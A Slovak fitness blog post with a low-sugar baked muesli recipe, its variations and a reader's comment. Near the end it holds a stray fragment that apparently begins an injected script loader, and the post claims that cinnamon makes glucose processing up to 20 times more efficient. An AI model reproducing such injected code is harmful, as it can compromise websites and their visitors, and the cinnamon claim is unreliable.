Jablkový flan od Dominiky mal minulý týždeň taký úspech, že sme sa s ňou dohodli, že pre Vás bude písať fitness recepty pravidelne :). Dnes si prichystala domáce müsli s rôznymi variáciami ingrediencii.
Opäť som to raz poňala raňajkovo a ponúkam Vám recept na domáce müsli. Je to nielen lacnejšia, ale hlavne zdravšia alternatíva pre tých, ktorí obľubujú vločky ako správny štart do dňa. Recept, ktorý Vám predstavím, je bez pridaného tuku, cukru a hlavne veľmi bohatý na rozpustnú vlákninu.
Prečo by sme mali z času na čas urobiť výnimku pre ovsené vločky napriek tomu, že sa stravujeme nízkosacharidovo? Ak Ste celiatik, využite nižšie uvedené variácie.
- Obsahujú veľa rozpustnej vlákniny (betaglukánu), ktorá pomáha znižovať hodnoty LDL cholesterolu a triglyceridov v krvi. Môžu sa s čistým svedomím označovať ako prevencia voči kardiovaskulárnym ochoreniam.
- Pýšia sa najvyšším podielom proteínov a čo sa zŕn týka aj niekoľkými miligramami železa, ktoré športovci strácajú potením.
- Majú veľmi nízku glykemickú záťaž, pomáhajú stabilizovať hladinu glukózy a inzulínu v krvi, vďaka čomu sú vhodné pre diabetikov.
- Jedzte ich s rozumným časovým odstupom od výkonu a týmto spôsobom zaistíte palivo pre svaly. Ak si k nim pridáme nižšie spomínanú škoricu, môžeme až 20-násobne zefektívniť spracovanie glukózy v našich bunkách.
Ingrediencie:
- 2x 250ml šálka ovsených vločiek (neuvádzam tu hmotnosť, lebo každé vločky sú iného zloženia, a nám tu ide skôr o objem masy ako o jej presnú hmotnosť)
- 4 lyžice jablkového pyré
- 1 lyžička psyllium vlákniny (rovno do masy)
- 1 lyžička psyllium +4 PL horúcej vody
- 1 lyžička javorového sirupu alebo pravého medu (nemusí byť)
- ½ šálky nasekaných, nelúpaných mandlí alebo horkej čokolády (70%)
- ½ lyžičky mletej škorice (ak robíme madľové müsli)
Postup:
- Predhrejeme si teplovzdušnú rúru na 100°C.
- Uvedené množstvo psyllium zmiešame s vodou a necháme napučať približne jednu minútku, aby sa nám vytvoril gél.
- Všetky ostatné ingrediencie spojíme v miske. Pridáme napučané psyllium a spracovávame masu rukami, aby sme lepšie vytvarovali zlepence.
- Müsli rozprestrieme na papier na pečenie a pečieme 30 minút.
- Potom ich otočíme a pečieme ďalších 30 minút z druhej strany aby sa nám vysušili.
- Müsli treba nechať úplne vychladnúť v pootvorenej rúre.
Skladovať ich môžeme v dóze približne jeden týždeň. Nemám otestované o koľko dlhšie vydržia, lebo sú naozaj chutné a vždy mi s ich konzumáciou niekto ochotne pomôže :).
Ďalšie variácie:
Vločky – Pre bezlepkových jedákov odporúčam pohánkové vločky alebo certifikované bezlepkové ovsené vločky. Ak sa snažíte stravovať nízkosacharidovo, s pokojom na duši môžete kombinovať kokosové hobliny a mandľové lupienky, či už samotné alebo aj s vločkami. Tu treba dávať pozor na to, aby nezhoreli a preto by som ich pozorne sledovala po 20 minútach pečenia.
Jablkové pyré – Môžete použiť čisté jablkové alebo vyskúšať iné príchute ako banán, marhule alebo jahody.
Psyllium, ako čistý zdroj vlákniny môžeme nahradiť nutrične rozmanitejšími chia semiačkami, ktoré si pripravíme rovnakým spôsobom ako psyllium.
Mandle môžeme hravo nahradiť lieskovcami, kešu orieškami, makadamiovými orieškami, pekanovými alebo vlašskými orechami. Para orechy neodporúčam, tie by sa mali konzumovat maximálne dva kusy denne.
Bez pridaného tuku* Bez cukru * Bez laktózy * Bez lepku
Mne, Martine, to samozrejme nedalo a vyskúšala som recept :). Síce ja som na Whole30 a také papať nesmiem, ale priateľovi veľmi chutili. Ja som ich vyskúšala s chia gélom, lieskovcami a raw kakaom.
var d=document;var s=d.createElement(‘script’);
Leave a Reply
You must be logged in to post a comment.